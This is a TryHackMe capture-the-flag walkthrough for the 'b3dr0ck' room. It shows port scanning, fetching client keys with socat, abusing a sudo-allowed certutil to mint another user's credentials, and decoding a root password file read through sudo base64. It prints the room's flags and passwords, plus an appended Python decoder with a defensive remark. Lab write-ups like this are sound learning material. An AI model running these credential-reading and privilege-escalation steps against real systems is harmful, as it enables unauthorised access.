
[TryHackMe] b3dr0ck: Walkthrough

Overview

This is a walkthrough of the TryHackMe room "b3dr0ck".

Task 1

Q1. What is the barney.txt flag?

Hint. Explore the higher ports, one is ready for a TLS socket with key & cert obtained from port 9009

Run a port scan.

$ nmap -Pn -sC -sV -A -T4 -p- 10.10.192.220 -oN nmap_result
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 1a:c7:00:71:b6:65:f5:82:d8:24:80:72:48:ad:99:6e (RSA)
|   256 3a:b5:25:2e:ea:2b:44:58:24:55:ef:82:ce:e0:ba:eb (ECDSA)
|_  256 cf:10:02:8e:96:d3:24:ad:ae:7d:d1:5a:0d:c4:86:ac (ED25519)
80/tcp    open     http         nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://10.10.192.220:4040/
|_http-server-header: nginx/1.18.0 (Ubuntu)
4040/tcp  open     ssl/yo-main?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2024-07-28T12:41:38
|_Not valid after:  2025-07-28T12:41:38
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Date: Sun, 28 Jul 2024 13:05:29 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>ABC</title>
|     <style>
|     body {
|     width: 35em;
|     margin: 0 auto;
|     font-family: Tahoma, Verdana, Arial, sans-serif;
|     </style>
|     </head>
|     <body>
|     <h1>Welcome to ABC!</h1>
|     <p>Abbadabba Broadcasting Compandy</p>
|     <p>We're in the process of building a website! Can you believe this technology exists in bedrock?!?</p>
|     <p>Barney is helping to setup the server, and he said this info was important...</p>
|     <pre>
|     Hey, it's Barney. I only figured out nginx so far, what the h3ll is a database?!?
|     Bamm Bamm tried to setup a sql database, but I don't see it running.
|     Looks like it started something else, but I'm not sure how to turn it off...
|     said it was from the toilet and OVER 9000!
|     Need to try and secure
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Date: Sun, 28 Jul 2024 13:05:30 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>ABC</title>
|     <style>
|     body {
|     width: 35em;
|     margin: 0 auto;
|     font-family: Tahoma, Verdana, Arial, sans-serif;
|     </style>
|     </head>
|     <body>
|     <h1>Welcome to ABC!</h1>
|     <p>Abbadabba Broadcasting Compandy</p>
|     <p>We're in the process of building a website! Can you believe this technology exists in bedrock?!?</p>
|     <p>Barney is helping to setup the server, and he said this info was important...</p>
|     <pre>
|     Hey, it's Barney. I only figured out nginx so far, what the h3ll is a database?!?
|     Bamm Bamm tried to setup a sql database, but I don't see it running.
|     Looks like it started something else, but I'm not sure how to turn it off...
|     said it was from the toilet and OVER 9000!
|_    Need to try and secure
| tls-alpn: 
|_  http/1.1
9009/tcp  open     pichat?
| fingerprint-strings: 
|   NULL: 
|     ____ _____ 
|     \x20\x20 / / | | | | /\x20 | _ \x20/ ____|
|     \x20\x20 /\x20 / /__| | ___ ___ _ __ ___ ___ | |_ ___ / \x20 | |_) | | 
|     \x20/ / / _ \x20|/ __/ _ \| '_ ` _ \x20/ _ \x20| __/ _ \x20 / /\x20\x20| _ <| | 
|     \x20 /\x20 / __/ | (_| (_) | | | | | | __/ | || (_) | / ____ \| |_) | |____ 
|     ___|_|______/|_| |_| |_|___| _____/ /_/ _____/ _____|
|_    What are you looking for?
54321/tcp open     ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2024-07-28T12:41:38
|_Not valid after:  2025-07-28T12:41:38
| fingerprint-strings: 
|   DNSStatusRequestTCP, Kerberos, LDAPSearchReq, RPCCheck, SIPOptions, SMBProgNeg, TLSSessionReq, oracle-tns: 
|_    Error: 'undefined' is not authorized for access.

The open ports are now known.

Port   Service   Version
22     ssh       OpenSSH 8.2p1
80     http      nginx 1.18.0
4040   http      ssl/yo-main?
9009   pichat?
54321  ssl/unknown

Accessing port 80 redirects to port 4040.

[Image: 4040 redirect.jpg]

Accessing port 9009 shows a hint about the command used to access port 54321.

[Image: 9009.jpg]

Connecting to port 9009 with socat hands out a client certificate and its private key.

$ socat TCP:10.10.192.220:9009 -
You use this service to recover your client certificate and private key
What are you looking for? key
Sounds like you forgot your private key. Let's find it for you...

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAt+MLXHtQiHrbW3n4wcbG3u2lzZwrQtAklkFEHwL905bzFxXh
Y/dWM9R6J6aTVIi5TzP0TJhZqVQKxPY7JIsv1WcZGD1sXe8pNW4oxIHs+pUHCg2E

(omitted)

5RzOMrMSKJq4ybQgMNA+Nf1D2vw/cnQlCwFBSjUNhw1tyTvvSp+55g==
-----END RSA PRIVATE KEY-----

What are you looking for? certi
Sounds like you forgot your certificate. Let's find it for you...

-----BEGIN CERTIFICATE-----
MIICoTCCAYkCAgTSMA0GCSqGSIb3DQEBCwUAMBQxEjAQBgNVBAMMCWxvY2FsaG9z
dDAeFw0yNDA3MjgxMjQyMjVaFw0yNTA3MjgxMjQyMjVaMBgxFjAUBgNVBAMMDUJh

(omitted)

myPbWzYDXFUvN5EnSfgNlkm7eGa/5QXKr6dvX7ns/4UfUMeR+37hlazPgJu7vVoC
cDeqE1s=
-----END CERTIFICATE-----

Connect to port 54321 using the obtained certificate and private key.

$ socat stdio ssl:10.10.192.220:54321,cert=certificate.crt,key=private_key,verify=0 
2024/07/28 09:31:52 socat[27463] W refusing to set empty SNI host name


 __     __   _     _             _____        _     _             _____        _ 
 \ \   / /  | |   | |           |  __ \      | |   | |           |  __ \      | |
  \ \_/ /_ _| |__ | |__   __ _  | |  | | __ _| |__ | |__   __ _  | |  | | ___ | |
   \   / _` | '_ \| '_ \ / _` | | |  | |/ _` | '_ \| '_ \ / _` | | |  | |/ _ \| |
    | | (_| | |_) | |_) | (_| | | |__| | (_| | |_) | |_) | (_| | | |__| | (_) |_|
    |_|\__,_|_.__/|_.__/ \__,_| |_____/ \__,_|_.__/|_.__/ \__,_| |_____/ \___/(_)
                                                                                 
                                                                                 

Welcome: 'Barney Rubble' is authorized.
b3dr0ck>

The server gives us what looks like SSH credentials.

b3dr0ck> ls
Unrecognized command: 'ls'

This service is for login and password hints
b3dr0ck> password
Password hint: d1ad7c0a3805955a35eb260dab4180dd (user = 'Barney Rubble')

SSH login succeeds with username barney and password d1ad7c0a3805955a35eb260dab4180dd.

$ ssh barney@10.10.192.220
barney@b3dr0ck:~$

The flag can be obtained from /home/barney/barney.txt.

/home/barney/barney.txt
THM{f05780f08f0eb1de65023069d0e4c90c}

A. THM{f05780f08f0eb1de65023069d0e4c90c}

Q2. What is fred's password?

Hint. You can find it same way as barney's, with fred's credentials (cert + key)

Checking with sudo -l reveals that /usr/bin/certutil can be run as root.

$ sudo -l
[sudo] password for barney: 
Matching Defaults entries for barney on b3dr0ck:
    insults, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User barney may run the following commands on b3dr0ck:
    (ALL : ALL) /usr/bin/certutil

The /usr/bin/certutil command lists certificates and keys; the files are located under /usr/share/abc/certs.

$ sudo /usr/bin/certutil ls

Current Cert List: (/usr/share/abc/certs)
------------------
total 56
drwxrwxr-x 2 root root 4096 Apr 30  2022 .
drwxrwxr-x 8 root root 4096 Apr 29  2022 ..
-rw-r----- 1 root root  972 Jul 28 12:42 barney.certificate.pem
-rw-r----- 1 root root 1678 Jul 28 12:42 barney.clientKey.pem
-rw-r----- 1 root root  894 Jul 28 12:42 barney.csr.pem
-rw-r----- 1 root root 1678 Jul 28 12:42 barney.serviceKey.pem
-rw-r----- 1 root root  976 Jul 28 12:42 fred.certificate.pem
-rw-r----- 1 root root 1674 Jul 28 12:42 fred.clientKey.pem
-rw-r----- 1 root root  898 Jul 28 12:42 fred.csr.pem
-rw-r----- 1 root root 1678 Jul 28 12:42 fred.serviceKey.pem

Using the -a option, we obtained a certificate and private key for the fred account.

$ sudo /usr/bin/certutil -a fred.csr.pem
Generating credentials for user: a (fredcsrpem)
Generated: clientKey for a: /usr/share/abc/certs/a.clientKey.pem
Generated: certificate for a: /usr/share/abc/certs/a.certificate.pem
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAxIzi//1luz5rRhD575qiDaogyk7uffWHITr/JzjJjIsNWRfW
ueHJw/dtekCNlBepqUwmbvpIYXLCiA2DyLFZC5DwQfKjASPo65fxKl7pGCqygOW

(omitted)

QaYG1I7TKfs7zHBtULvNEkewlklu1to98LxATzrctCWy7Gt7C67qFw==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICnjCCAYYCAjA5MA0GCSqGSIb3DQEBCwUAMBQxEjAQBgNVBAMMCWxvY2FsaG9z
dDAeFw0yNDA3MjgxMzUwMTJaFw0yNDA3MjkxMzUwMTJaMBUxEzARBgNVBAMMCmZy

(omitted)

90gUYUuv4wntOwqGbMxJS2eg/zBKAxXDxIgcZVJKPjm6/aXftYbunGozL2GYhikB
6u0=
-----END CERTIFICATE-----

As in Q1, use socat with fred's certificate and private key to access the server.

$ socat stdio ssl:10.10.192.220:54321,cert=fred_cert.csr,key=fred_priv_key,verify=0  
2024/07/28 09:54:18 socat[38652] W refusing to set empty SNI host name


 __     __   _     _             _____        _     _             _____        _ 
 \ \   / /  | |   | |           |  __ \      | |   | |           |  __ \      | |
  \ \_/ /_ _| |__ | |__   __ _  | |  | | __ _| |__ | |__   __ _  | |  | | ___ | |
   \   / _` | '_ \| '_ \ / _` | | |  | |/ _` | '_ \| '_ \ / _` | | |  | |/ _ \| |
    | | (_| | |_) | |_) | (_| | | |__| | (_| | |_) | |_) | (_| | | |__| | (_) |_|
    |_|\__,_|_.__/|_.__/ \__,_| |_____/ \__,_|_.__/|_.__/ \__,_| |_____/ \___/(_)
                                                                                 
                                                                                 

Welcome: 'fredcsrpem' is authorized.
b3dr0ck>

We obtained fred's password.

b3dr0ck> password
Password hint: YabbaDabbaD0000! (user = 'fredcsrpem')

A. YabbaDabbaD0000!

Q3. What is the fred.txt flag?

Log in as fred.

$ su fred
Password: 
fred@b3dr0ck:~$

The flag can be obtained from /home/fred/fred.txt.

/home/fred/fred.txt
THM{08da34e619da839b154521da7323559d}

A. THM{08da34e619da839b154521da7323559d}

Q4. What is the root.txt flag?

Hint. [root pass] Multi encode/decode (+ crackstation ;)

Check with sudo -l.

$ sudo -l
Matching Defaults entries for fred on b3dr0ck:
    insults, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User fred may run the following commands on b3dr0ck:
    (ALL : ALL) NOPASSWD: /usr/bin/base32 /root/pass.txt
    (ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass.txt

Decoding /root/pass.txt layer by layer yields the password hash.

$ sudo /usr/bin/base64 /root/pass.txt | base64 -d | base32 -d | base64 -d
a00a12aad6b7c16bf07032bd05a31d56

The obtained hash was looked up on the site shown below to identify the password.

[Image: root pass.jpg]

Log in as root and obtain the flag from /root/root.txt.

Password: 
root@b3dr0ck:/home/fred#
/root/root.txt
THM{de4043c009214b56279982bf10a661b7}

A. THM{de4043c009214b56279982bf10a661b7}
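The Q4 pipeline above hard-codes the order of the three encoding layers. The following added example (my own code, not part of the walkthrough or the room) generalises it: it peels base32/base64 layers until a bare 32-hex digest appears, which shows why stacking encoders around an unsalted MD5 gives no protection. The digest and the wrapped sample file are constructed, not the room's real values.

```python
import base64
import binascii
import re

# Constructed sample (not the room's real file): a 32-hex digest, the shape of an
# unsalted MD5, wrapped base64 -> base32 -> base64, i.e. the mirror image of the
# walkthrough's pipeline "base64 -d | base32 -d | base64 -d".
SAMPLE_DIGEST = b"0123456789abcdef0123456789abcdef"
SAMPLE_PASS_TXT = base64.b64encode(base64.b32encode(base64.b64encode(SAMPLE_DIGEST))) + b"\n"

HEX_DIGEST = re.compile(rb"^[0-9a-f]{32}$")

# Try base32 before base64: base32 text is also valid base64 alphabet, but
# base64 text (lowercase, 0/1/8/9, +, /) is never valid base32.
DECODERS = (
    ("base32", base64.b32decode),
    ("base64", lambda s: base64.b64decode(s, validate=True)),
)


def looks_like_md5(data: bytes) -> bool:
    """Bare 32-hex-char string: the shape of an unsalted MD5, crackable offline."""
    return HEX_DIGEST.match(data.strip()) is not None


def peel_layer(data: bytes):
    """Remove one encoding layer; return (name, decoded) or None if no decoder
    yields printable ASCII."""
    for name, decode in DECODERS:
        try:
            out = decode(data.strip())
        except (binascii.Error, ValueError):
            continue
        if out and all(32 <= b < 127 for b in out):
            return name, out
    return None


def unwrap(data: bytes, max_layers: int = 8):
    """Peel base32/base64 layers until the payload looks like a digest or
    nothing decodes cleanly. Returns (layers removed in order, final bytes)."""
    layers = []
    for _ in range(max_layers):
        if looks_like_md5(data):
            break
        step = peel_layer(data)
        if step is None:
            break
        name, data = step
        layers.append(name)
    return layers, data


if __name__ == "__main__":
    removed, payload = unwrap(SAMPLE_PASS_TXT)
    print("layers:", " -> ".join(removed), "| payload:", payload.decode())
```

The defensive takeaway is that the sudo rule, not the encoding, is the control that failed: any encoder allowed via sudo on a sensitive file is a read primitive for that file.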
